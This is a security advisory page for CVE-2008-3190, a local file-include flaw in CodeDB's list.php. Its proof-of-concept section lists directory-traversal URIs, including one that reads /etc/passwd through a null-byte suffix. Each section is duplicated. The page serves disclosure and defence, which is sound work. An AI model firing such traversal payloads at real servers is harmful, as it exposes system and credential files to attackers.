CodeDB 'list.php' Local File Include Vulnerability
BID:30227
Info
CodeDB 'list.php' Local File Include Vulnerability
| Bugtraq ID: | 30227 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3190 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 14 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | cOndemned |
| Vulnerable: |
1Scripts CodeDB 0 |
| Not Vulnerable: | |
Discussion
CodeDB 'list.php' Local File Include Vulnerability
CodeDB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to obtain sensitive information that may aid in further attacks.
CodeDB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to obtain sensitive information that may aid in further attacks.
Exploit / POC
CodeDB 'list.php' Local File Include Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/[codeDB_path]/list.php?lang=../readme.txt%00
http://www.example.com/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
http://www.example.com/[codeDB_path]/list.php?lang=../[local_file]%00
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/[codeDB_path]/list.php?lang=../readme.txt%00
http://www.example.com/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
http://www.example.com/[codeDB_path]/list.php?lang=../[local_file]%00
Solution / Fix
CodeDB 'list.php' Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].